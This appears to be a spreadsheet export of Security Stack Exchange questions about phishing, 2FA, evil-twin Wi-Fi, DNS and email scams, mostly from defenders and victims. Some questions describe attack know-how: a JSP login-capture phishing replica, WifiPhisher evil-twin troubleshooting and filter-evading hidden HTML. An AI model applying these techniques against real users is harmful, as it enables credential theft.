    <t>&lt;p&gt;First of all there was the PSN hack, which was compromised due to a vulnerable version of Apache and no Firewall and using a developer console. Then &lt;a href="http://nakedsecurity.sophos.com/2011/05/22/sony-bmg-greece-the-latest-hacked-sony-site/" rel="nofollow"&gt;Sony Greece fell&lt;/a&gt; due to an SQL Injection attack. Then there was a &lt;a href="http://www.f-secure.com/weblog/archives/00002160.html" rel="nofollow"&gt;phishing site&lt;/a&gt; on Sony's Thailand servers. Then &lt;a href="http://toronto.ctv.ca/servlet/an/local/CTVNews/20110525/sony-ericsson-canada-customers-hit-by-online-breach-110525/20110525/?hub=TorontoNewHome" rel="nofollow"&gt;Sony Canada&lt;/a&gt; and &lt;a href="http://news.cnet.com/8301-27080_3-20065816-245.html" rel="nofollow"&gt;Sony Japan&lt;/a&gt; were compromised. Then &lt;a href="http://www.washingtonpost.com/blogs/faster-forward/post/lulzsec-releases-sony-data/2011/06/02/AGGcLWHH_blog.html" rel="nofollow"&gt;today&lt;/a&gt; SonyPictures.com was compromised.&lt;/p&gt;
 &lt;p&gt;How significant is itfor such a large corporation to be continuously attacked like Sony have been and what if any impact will these attacks have on the IT Security industry?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;</t>
  </si>
  <si>
    <t>Can opening a blackmail/phishing email on outlook cause issues?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently ran some programs on my computer that caused some kind of security breach, I reinstalled windows (after formatting) to fix it.&lt;/p&gt;
 &lt;p&gt;3 days later I got an email with my old windows password blackmailing me, the message seem...automated, didn't even have my name, so I'm sure it was a phishing attempt, I opened it on my iphone just to be safe (hopefull that's accurate?) It was on my outlook.&lt;/p&gt;
 &lt;p&gt;But later I may have reopen it on my chrome browser on windows 10 on my PC, I don't think I was that stupid...but in case I WAS. Can I get virus/malwares from opening an email on hotmail with my chrome browser?&lt;/p&gt;
 &lt;p&gt;I have scanned my computer with windows defender and malwarebytes and nothing turn up, so should that means I'm safe?&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;virus&gt;</t>
  </si>
  <si>
    <t>Should I enter fake password to phishing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;Hope I have chosen correct forum to ask this question.&lt;/p&gt;
 &lt;p&gt;The other day it happened to me. I got e-mail from my admins requesting me to update my password. "Not again" I mouthed and clicked the link.&lt;/p&gt;
 &lt;p&gt;Luckily, I am always checking URLs, which saved me this time. I clicked phishing e-mail. The site looked really like Microsoft Office (we use Microsoft Outlook) and it wanted me to first enter my current password.&lt;/p&gt;
 &lt;p&gt;At that moment I already knew I have to be cautious about next steps and was investigating what I can do about my visit to the phishing site.&lt;/p&gt;
 &lt;p&gt;Being already angered, I was thinking about submitting here something really &lt;strong&gt;really&lt;/strong&gt; offensive as my "current" password.&lt;/p&gt;
 &lt;p&gt;Obviously, I do not use swear words as my password, I follow usual guidelines in how to create passwords.&lt;/p&gt;
 &lt;p&gt;At the end of the day, I did nothing, but the question still pings in my head: Would posting fake password to phishing site help anything in regards of my personal security and/or my company security?&lt;/p&gt;
 &lt;p&gt;P.S: I notified IT department about the mail, so the company is aware about this phishing attempt&lt;/p&gt;</t>
  </si>
  <si>
    <t>Phish Proof Website. Possible?</t>
  </si>
  <si>
    <t>&lt;p&gt;Seeing how big names like Gmail, Yahoo! (despite the login seal) and Hotmail (Live Mail) are prone to phishing attacks, this raises the question of whether it is possible (theoretically) to safeguard a website login form from phishing scams?&lt;/p&gt;
 &lt;p&gt;Now before we go in answering whether it is possible to (theoretically) phish-proof a website, I understand that we need to establish a few factors.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;What is the general method used for creating a phish login page? Is it possible to counter this &lt;em&gt;generalized&lt;/em&gt; phish-page-creation method? That is, if a programmer is able to defeat the "generalized" phish-creation-method, can he/she expect to make a major change in the security industry?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What is the programming and tech understanding of the &lt;strong&gt;majority&lt;/strong&gt; of phish-hackers? If it is not possible to completely phish-proof a website's login system, is it possible to effectively push out 80-90% phish-makers out of the game by making the phish-page-creation a complex and difficult process?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What is the theory behind some of the phish-proofing mechanisms in practice today (Yahoo login seal etc)? Are these methods effective? If the methods are practically ineffective, is it possible to improve the efficiency of these methods while sticking to the same theory/idea? Or is it the very approach which is erratic?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I know experts would have varying views on these matters, but I hope I could at least find some points of consensus on these issues.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is there any way to detect Phishing and Deceptive page ( social engineering )</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm programmer and I have a website that allows users to upload their HTML websites to it.&lt;/p&gt;
 &lt;p&gt;The user will zip up a folder and then will upload it to my website where it will show up as sub-domain.&lt;/p&gt;
 &lt;p&gt;I don't allow PHP files or some other extension (only HTML and some stuff)&lt;/p&gt;
 &lt;p&gt;The problem I have now is that there are some bad users who are trying to upload some HTML file with social engineering contents (Facebook login , PayPal, etc)&lt;/p&gt;
 &lt;p&gt;Now Google is sending me notifications about these harmful links 
 and asks me to find a solution and remove this content.&lt;/p&gt;
 &lt;p&gt;As a programmer the only solution that i have is checking the file by myself manually and it's so hard to do that.&lt;/p&gt;
 &lt;p&gt;Anyone have a solution for this problem? I found some free hosting that detects some social engineering contents immediately, so some workable solution must exist.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;html&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Isn't OAuth, OpenID, Facebook Connect, and others crazy from a security standpoint?</t>
  </si>
  <si>
    <t>&lt;p&gt;I work with APIs all the time and I work with web developers who insist that OAuth, OpenID, etc are far superior than a home-brew method. Every site seems to be using these as well now for ease of use to the user, but also for security. I hear it every day almost that it's more secure, but I find that extremely hard to believe for a few reasons:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;If a hacker somehow gets your password to one site, he know has access to the majority of the sites you visit now.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;It makes phishing 10x easier. With so many people using the same logins and doing it over, and over again people are less likely to actually read everything and check the URL up top.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Could you list of more reasons why it's unsafe or could you explain to me why it is more safe? I don't see why you would put up with the hassle of integrating one of these when it seems like a user would be fine entering in 3 fields (username, password, email) instead of clicking service logo to login (Twitter, Google, FB etc), entering in their username/password, clicking submit, clicking approve.&lt;/p&gt;
 &lt;p&gt;==Update==&lt;/p&gt;
 &lt;p&gt;To expand on my question as per request.&lt;/p&gt;
 &lt;p&gt;To my two points above, &lt;strong&gt;#1&lt;/strong&gt;, doesn't matter how the hacker gets it. I'm not sure how to expand upon it exactly. You could brute force it, guess it, use the forgot password and do a dictionary attack on common questions, etc. But however you do it my point is, &lt;strong&gt;1 password to access 1000 servers is far less safe than 1000 passwords to access 1000 different sites.&lt;/strong&gt; I can personally guess a few of my friends' and family's passwords and ill have access to all kinds of accounts. I wouldn't even have to look for them. As i browse the web ill just be logged in... If i was a hacker, many of these passwords are very easy to crack. Some of my friend's passwords are, &lt;code&gt;pepsi&lt;/code&gt;, &lt;code&gt;tina&lt;/code&gt;(then birth year), &lt;code&gt;123456&lt;/code&gt;, and other stupid ones. My favorite though is &lt;code&gt;tomcruisesucks&lt;/code&gt; LOL.&lt;/p&gt;
 &lt;p&gt;For &lt;strong&gt;#2&lt;/strong&gt; point, to expand further, I might go to &lt;a href="http://wired.com"&gt;http://wired.com&lt;/a&gt;, &lt;a href="http://klout.com"&gt;http://klout.com&lt;/a&gt;, &lt;a href="http://twitter.com"&gt;http://twitter.com&lt;/a&gt;, &lt;a href="http://thenextweb.com"&gt;http://thenextweb.com&lt;/a&gt; and they all have a Twitter login. I trust the sites (for the most part) so, honestly, I don't check the URL of the popup window that comes up to login anymore and I assume most do not. That popup window could have been easily hacked by a hacker getting on one of their servers, or an evil employee, or just a fake app site that a bot is sending to people over twitter that multiple people then login to this fake app, but using the Twitter login.&lt;/p&gt;
 &lt;p&gt;People are &lt;strong&gt;so used to seeing the same login pages they don't look anymore&lt;/strong&gt;. If this thread gets popular enough I can easily do a super simple test on Twitter or FB by sending everyone a link to a fake app, have a popup window that looks like Twitter or FB and they'll login. I guarantee it. If i make the login screen go to, lets say, &lt;a href="http://bankofamerica.com"&gt;http://bankofamerica.com&lt;/a&gt; or &lt;a href="http://paypal.com"&gt;http://paypal.com&lt;/a&gt; they'll ask themselves why am i here, why do they need this info, etc. The same sites used to login over and over again is extremely bad in practice.&lt;/p&gt;
 &lt;p&gt;That's my expanded discussion point ;)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;openid&gt;&lt;oauth&gt;</t>
  </si>
  <si>
    <t>Does 2FA Help Prevent Unauthorized Access in Phishing Attacks?</t>
  </si>
  <si>
    <t>&lt;h1&gt;Given&lt;/h1&gt;
 &lt;ol&gt;
 &lt;li&gt;Attacker is targeting a user of &lt;code&gt;bank.com&lt;/code&gt;.&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;bank.com&lt;/code&gt; uses SMS or Google Authenticator 2FA, where the user enters the 2FA code into a form.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;h1&gt;Scenario&lt;/h1&gt;
 &lt;ol&gt;
 &lt;li&gt;Attacker registers domain name &lt;code&gt;baank.com&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;Attacker creates a web page that scrapes the login page of &lt;code&gt;bank.com&lt;/code&gt; and presents it from the domain &lt;code&gt;baank.com&lt;/code&gt; (or working as a MITM proxy to send user supplied details back to &lt;code&gt;bank.com&lt;/code&gt; if needed).&lt;/li&gt;
 &lt;li&gt;Attacker sends a phishing email to the user getting them to log in to &lt;code&gt;baank.com&lt;/code&gt; instead of &lt;code&gt;bank.com&lt;/code&gt;.&lt;/li&gt;
 &lt;li&gt;User fills in their username, password, and 2FA (as per usual).&lt;/li&gt;
 &lt;li&gt;Attacker now has the users credentials as well the 2FA that the user supplied.&lt;/li&gt;
 &lt;li&gt;Attacker immediately (maybe through a script) logs in to the bank account since he has the username, pass, and 2FA.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;h1&gt;Question&lt;/h1&gt;
 &lt;p&gt;Am I missing something or does user-entered 2FA not help in this scenario?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;multi-factor&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Unusual phishing email</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://i.stack.imgur.com/sNwPv.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/sNwPv.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Usually with these of types of scams there's a phishing link inside the email. However, there are no clickable links in this email and appleid.apple.com is an official Apple site.&lt;/p&gt;
 &lt;p&gt;In between the regular English characters there are letters and numbers scattered around with a font size of 0 and a transparent colour. There are also a couple of HTML tags with apparently random text. Example of the HTML code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Th&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;6&amp;lt;/font&amp;gt;e&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;n&amp;lt;/font&amp;gt; &amp;lt;font style='color:transparent;font-size:0px'&amp;gt;c&amp;lt;/font&amp;gt;f&amp;lt;!xklyv&amp;gt;o&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;4&amp;lt;/font&amp;gt;l&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;k&amp;lt;/font&amp;gt;l&amp;lt;!z5y08&amp;gt;o&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;4&amp;lt;/font&amp;gt;w&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;a&amp;lt;/font&amp;gt;i&amp;lt;!g&amp;gt;ng &amp;lt;font style='color:transparent;font-size:0px'&amp;gt;h&amp;lt;/font&amp;gt;c&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;y&amp;lt;/font&amp;gt;h&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;0&amp;lt;/font&amp;gt;a&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;d&amp;lt;/font&amp;gt;n&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;5&amp;lt;/font&amp;gt;ge&amp;lt;!ctubo&amp;gt;s to&amp;lt;font style='color:transparent;font-size:0px'&amp;gt;i&amp;lt;/font&amp;gt; &amp;lt;!vg&amp;gt;yo
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The body of the text actually looks like the following:
 if y0o0ua td5id 2nao5t bmakpe thebs0ev ch5angmes momrh ipfc you bvelsieveh ban unauthorised9 uperson9 dhas zaccesuse9d dymo2u2r accouxnsth&lt;/p&gt;
 &lt;p&gt;How does this phishing email work? Does something happen just by opening the email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Mirroring images in a blog article</t>
  </si>
  <si>
    <t>&lt;p&gt;When visiting &lt;a href="http://de.francais-express.com/nachrichten/digital/-2498-phishing-ratgeber-so-erkennt-ihr-gefalschte-e-mails/" rel="nofollow"&gt;this website&lt;/a&gt;, I spotted something weird about the images used. The sources of all images are mirrored horizontally and are being mirrored back with css: &lt;code&gt;transform: scaleX(-1);&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Why would someone do that when posting a blog article etc. ? I can imagine that an image-search would not find the images on the given website, but security-wise I do not see any benefits. If anyone wants to steal one of the images, they can just mirror them on their own, which even works out with MS Paint.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;image&gt;</t>
  </si>
  <si>
    <t>efficient subdomain extraction</t>
  </si>
  <si>
    <t>&lt;p&gt;I am wondering how we can effectively extract all subdomains of given website? For example, the free hosting websites, I would like to extract all subdomains and see if I can find some subdomains related to our company that's maybe used for phishing.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;websites&gt;&lt;sub-domain&gt;&lt;bulk-extractor&gt;</t>
  </si>
  <si>
    <t>Cpanel Phising Link</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I received a cpanel phishing link and I clicked on it. It redirected to another cpanel. I decide to look at the url, and here it is&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;redirect url
 https://example.net/esg9/cpanel.php?token=foofoofoofoofoofoo
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;After I click, it'll redirect again&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://example.example.at:2083/cpsess1234567890/?token=foofoofoofoofoofoo
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have 5 questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Is that token mine or from the sender?&lt;/li&gt;
 &lt;li&gt;Can we produce dynamic email based on receiver? For example, the token might be generated from the header of my email (I don't know why I have theories like this)&lt;/li&gt;
 &lt;li&gt;I clicked on the link but didn't enter my credential in that fake cpanel login. Am I safe?&lt;/li&gt;
 &lt;li&gt;What should I do now? And what information should I seek?&lt;/li&gt;
 &lt;li&gt;Are we doomed at the moment we click the link? (we might not enter credential, nor download any file, but our sessionid, token, etc, can the hacker get it through POST method?)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Also I informed my hosting provider about this case.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;cpanel&gt;</t>
  </si>
  <si>
    <t>Facebook messages with a suspicious link, what information can they get if I dont enter any details?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received one of those messages from a Facebook friend where it says something like "Is this really you in this video?" and then send an accompanying link. I clicked this link from within Messenger on my Android phone and it opened a pornography website in my browser. I immediately closed the site but am now worried what information of mine might be compromised.&lt;/p&gt;
 &lt;p&gt;I have been googling this and many people say that it is a common phishing scam where they can get my Facebook login details and then send the message on to more people. However, I wasn't taken to a fake Facebook website and was never given an opportunity to provide my login details. I think it was just wanting me to sign up to a pornography website.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;If they didn't get me to login, how would they get my login details? Could I still be compromised?&lt;/li&gt;
 &lt;li&gt;And if their intention wasn't to get my details, how did the person that sent it to me get compromised?&lt;/li&gt;
 &lt;li&gt;Would it be dangerous if I were logged into the mobile Facebook website in a browser (not the app)?&lt;/li&gt;
 &lt;li&gt;Is it possible that something was downloaded to my Android just bey clicking the link? Is there a way I can check (or scan) &lt;em&gt;effectively&lt;/em&gt;?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;android&gt;&lt;phishing&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>How does WPA2-PSK prevent evil twin password phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say we have a WPA2-PSK secured AP and there are several clients like smartphones and notebooks that automatically connect to it.&lt;br&gt;
 Now if someone was to create another AP that looked completely the same from the outside (same channel, same encryption, same SSID, same BSSID etc...), but with a way stronger signal. Would it be possible for the software behind the AP to gather the information required to authenticate to the original AP just by letting clients try to authenticate to the evil twin? &lt;/p&gt;
 &lt;p&gt;From what I read and heard it is not possible. But I don't really understand why. 
 I understand there is some kind of handshake going back and forth between the client and the AP during the authentication process, but if the evil twin would simply play the man in the middle during that process, wouldn't it be able to get the the required data?&lt;/p&gt;
 &lt;p&gt;I suppose this question must have been asked before and I tried my best to find out if it has, but I couldn't find anything. So... my apologies in advance if this is a duplicate.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wpa2&gt;&lt;wpa2-psk&gt;</t>
  </si>
  <si>
    <t>Mail gateway allowing telnet connections</t>
  </si>
  <si>
    <t>&lt;p&gt;Our organization is currently being tested by a IT security firm who have stated that while our internet facing mail gateway is not an open relay, they can connect to it on port 25 using telnet and check if an internal address is valid or not using RCPT TO.&lt;/p&gt;
 &lt;p&gt;The firm has stated that this leaves us open to address enumeration, phishing of our staff, and an exposed service with no authentication requirement that may lead to compromise.&lt;/p&gt;
 &lt;p&gt;As an organization we have to accept email from any legitimate public email address but we of course have protections in place for spam etc.&lt;/p&gt;
 &lt;p&gt;I have been told that unauthenticated telnet or similar types of connections to port 25 of our external gateway should be blocked but I don't see a way of this being possible or am I incorrect in saying so.&lt;/p&gt;
 &lt;p&gt;I'm facing the same quandary regarding being told that we should prevent our email addresses from being verified in this or any other way to prevent enumeration. I don't see a way to do this given the nature of our organizations business and the need to ensure members of the public know that they have contacted a legitimate address in our organization.&lt;/p&gt;
 &lt;p&gt;Any advice is greatly appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;smtp&gt;&lt;enumeration&gt;&lt;telnet&gt;</t>
  </si>
  <si>
    <t>Surely I haven't won the lottery, but where's the scam?</t>
  </si>
  <si>
    <t>&lt;p&gt;Some time ago I received the following message on my personal mobile phone number:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;YOUR MOBILE NUMBER HAS WON 780,000EURO IN THE WORLD LOTTO END OF YEAR PROMO.FOR CLAIMS EMAIL(NAME/ADDRESS/PHONE) TO:Worldlotto@mediacombb.net&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;A &lt;a href="https://who.is/whois/mediacombb.net" rel="noreferrer"&gt;WhoIs&lt;/a&gt; search for mediacombb.net returns the following:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/wVA0L.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/wVA0L.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I certainly did not take part in this "World Lotto", so this being truthful is out of the question, and thus likely to be a scam.&lt;/p&gt;
 &lt;p&gt;How will the scammers benefit from me simply sending in my name, address and phone (which they already have), all of which they most likely have if they managed to get their hands on my personal phone number?&lt;/p&gt;
 &lt;p&gt;Not quite sure if it would be wise to go ahead with providing the requested 
 info and update the question with further details as the case progresses.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Karel B√≠lek</t>
  </si>
  <si>
    <t>What can and can't a malicious DNS do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been thinking of using &lt;a href="http://tunlr.net/" rel="nofollow noreferrer"&gt;http://tunlr.net/&lt;/a&gt; for accessing "geo-IP banned websites" like netflix.&lt;/p&gt;
 &lt;p&gt;However, I have my concerns about safety of using some third party DNS server for everything. So, my question is. Let's suppose I use something like tunlr.net or some other third party DNS server. What "evil" they can and can't do?&lt;/p&gt;
 &lt;p&gt;Let's also add these assumptions.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I access mails, facebooks and most importantly bank accounts &lt;strong&gt;&lt;em&gt;only&lt;/em&gt;&lt;/strong&gt; through https, but I don't check the certificates by hand, but let my browser do it for me&lt;/li&gt;
 &lt;li&gt;I generally disallow any third party plugins in browser as much as I can (flash, java, Acrobat)&lt;/li&gt;
 &lt;li&gt;I am smart enough not to fall for completely obvious phishing&lt;/li&gt;
 &lt;li&gt;I install actualization, but I don't use antivirus (since I use OS X and Ubuntu)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;With all this said - if I use some third party DNS server and it becomes malicious, what can they do?&lt;/p&gt;
 &lt;p&gt;[edit, 2017 - tunlr.net is no longer operating; it was a DNS server that redirected netflix to proxied US version for free. There might be similar servers now.]&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;</t>
  </si>
  <si>
    <t>user43639</t>
  </si>
  <si>
    <t>Is there a benefit to setting up a security key on an account that already has phone-based 2FA?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm looking at 2FA options for my Google account, and I noticed they now allow you to add a security key to your account. I'm a bit of a novice to infosec, but I'm struggling to see the benefit for me. My phone already covers the "something you have" component of account security. &lt;/p&gt;
 &lt;p&gt;The only thought I have is that a phisher could ask me to enter my 2FA code and use that to log in, and I might not notice. But I see no reason why a phisher couldn't ask me to tap the button on my security key, too.&lt;/p&gt;
 &lt;p&gt;Are there additional benefits to the security key that I'm not seeing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;account-security&gt;&lt;u2f&gt;&lt;hardware-token&gt;</t>
  </si>
  <si>
    <t>WifiPhisher not creating a fake access point</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently came to know about WifiPhisher. To test it, I set up an access point using my Windows laptop and tried to obtain its password using this tool in my Ubuntu machine. So, when I run the program, it can cause Denial of Service by sending deauth packets to the AP I have created, but it does not create its fake access point, which can cause Evil Twin attack. So, does anyone know how to get around this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;wifi&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phishing attack stuck with jsp loginAction.do page?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm testing a phishing website on a staged replica of an jsp web-application. I'm doing the usual attack which involves changing the post and action field of source code to divert to my own written jsp script capture the logins and redirect the victim to the original website. &lt;/p&gt;
 &lt;p&gt;It looks easy, but trust me, it's has been me more then 2 weeks and I cannot write the logins to the text file. I have tested the jsp page on my local wamp server it works fine. In staged, when I click on the ok button for user/password field I'm taken to loginAction.do script. I checked this using the tamper data add-on on Firefox. The only way I was able to make my script run was to use burp proxy intercept the request and change action parameter to refer my uploaded script. &lt;/p&gt;
 &lt;p&gt;I want to know what does an loginAction.do? I have googled it - it's quite common to see it in jsp application. I have checked the code; there is nothing that tells me why the page always points to the .do script instead of mine. Is there some kind of redirection in Tomcat? I like to know. I'm unable to exploit this attack vector? I need the community's help.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;webserver&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Does Push 2FA protect against phishing/MitM better than TOTP?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was having the debate of TOTP vs Push Notifications and found this claim online:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Is the 2FA method protected against phishing?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/oilT2.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/oilT2.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Chart Explanation: The most common method of phishing is persuading a
 user to click on an email that leads them to a website that looks like
 a legitimate site they do business with. The rogue site will steal
 both the user‚Äôs username and password, AND their one-time password
 delivered by SMS or Voice. It can even steal TOTPs generated from a
 disconnected soft-token app or physical hard token.&lt;/p&gt;
 &lt;p&gt;Why Is This Important: This is the biggest and most prevalent
 vulnerability with 2FA-protected solutions today, and all one-time
 password solutions are vulnerable. Push authentication methods
 eliminate this type of attack.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://authy.com/blog/degrees-of-security-what-to-look-for-in-your-2fa/" rel="nofollow noreferrer"&gt;https://authy.com/blog/degrees-of-security-what-to-look-for-in-your-2fa/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;In their example scenario, the attacker is getting the user's password (and TOTP) through a fake website and using it on the real site. In this same scenario (minus the TOTP), the attacker entering the password on the real site would trigger a push notification on the user's device.&lt;/p&gt;
 &lt;p&gt;If the user has been convinced that they are logging onto the real site, it stands to reason that they would approve the login attempt just as readily as they would enter a TOTP.&lt;/p&gt;
 &lt;p&gt;In this scenario, (how) does the Push Notification offer any additional protection compared to a TOTP?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;multi-factor&gt;&lt;one-time-password&gt;</t>
  </si>
  <si>
    <t>How can I as middleman verify whether a phishing site is valid if the scam listens only on the referrer link and blocks any other access methods?</t>
  </si>
  <si>
    <t>&lt;p&gt;How can I as a trusted user of a middleman company (such as PhishTank) verify whether a phishing site is valid if the scam listens only on a unique referrer link(randomly created) and is blocking any other access methods?&lt;/p&gt;
 &lt;p&gt;To throw a threat scenario into scene.&lt;/p&gt;
 &lt;p&gt;An attacker sent an email to a local bank officer, the email looks very similar to a official email of an employee in their company at a higher tier and the time was planned. Later they detect it was a spear-phishing attack from an old employee. They report the attack on PhishTank (for example), but there they can't verify it because the link doesn't allow direct access (only with a unique referrer as in the email). How can they still verify whether it was a valid report of not?&lt;/p&gt;
 &lt;p&gt;Now the real question,&lt;/p&gt;
 &lt;p&gt;On a technical view, how does such an attack work?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;detection&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Possible phishing victim. How to proceed?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was trying to buy tickets for a show on an official web page. This will be the last show of this band so the server went down pretty quickly. The band tweeted about difficulties and then someone posted a link to another known ticket selling page (which was also having a hard time but was occasionally able to load) There I was asked for:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Full name&lt;/li&gt;
 &lt;li&gt;Email address&lt;/li&gt;
 &lt;li&gt;Postal code&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Then you had to check the "I accept" checkbox and go to the next step. Here I was asked for:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Credit card number.&lt;/li&gt;
 &lt;li&gt;Credit card expiration date.&lt;/li&gt;
 &lt;li&gt;Credit card 3 security digits.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I provided those and was redirected to what seemed like a legit payment gateway asking for a security code being sent to my phone number via SMS. I received the SMS, provided the code and after a fairly long time, I was told my payment hasn't been proceed. I assumed it was because the page I was in was having a hard time due to high demand.&lt;/p&gt;
 &lt;p&gt;But now I realice it was stupid to follow a link someone just posted on a response twit. The band has not said anything about tickets being sold on another web page, so I searched for the name of that other page on Google and the first result is ticketsellingpage.com, and the second one is ticketsellingpage.net (what I just told happened on .net). Entering on .com, I search for this show and found nothing. Entering on .net gives me the Chrome privacy error.&lt;/p&gt;
 &lt;p&gt;So: have I been phished here? I "turned off" my card (not cancelled, I can turn it on later) very quickly after this, so I can not see any strange movements on my account. Should I just cancel my card and get a new number?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Website Authenticity/Verification without SSL</t>
  </si>
  <si>
    <t>&lt;p&gt;Are there any other ways of verifying the web server you're visiting is actually the correct one?&lt;br /&gt;
 For example, if a domain name's DNS was hypothetically hijacked, and users were directed to a phishing site that took it's place; then they would be none the wiser.&lt;/p&gt;
 &lt;p&gt;I know SSL does this already. But are there any ways that don't involve the use of SSL?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;authentication&gt;&lt;webserver&gt;&lt;http&gt;</t>
  </si>
  <si>
    <t>Does an email header/source contain sensitive information?</t>
  </si>
  <si>
    <t>&lt;p&gt;I think I received a phishing mail and I want to forward the email header/source to the company mentioned in the mail. &lt;/p&gt;
 &lt;p&gt;Is there any sensitive information in the header or source, besides the email text and addresses? For example, I saw that the antivirus (and version) used to check mail was mentioned.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>user180095</t>
  </si>
  <si>
    <t>TPM with the three main groups of functions</t>
  </si>
  <si>
    <t>&lt;p&gt;I‚Äôm a little unclear on this (marked strong):&lt;/p&gt;
 &lt;p&gt;"The public key authentication functions provide for on-chip key pair generation using a hardware
 random number generator, along with public key signature, verification, encryption, and decryption.
 By generating the private keys in the chip, and encrypting them anytime they are transferred outside
 the chip, &lt;strong&gt;the TPM guarantees that malicious software cannot access the keys at all. Even the owner of
 the keys cannot give the private keys away to phishing or pharming attacks, as the keys are never
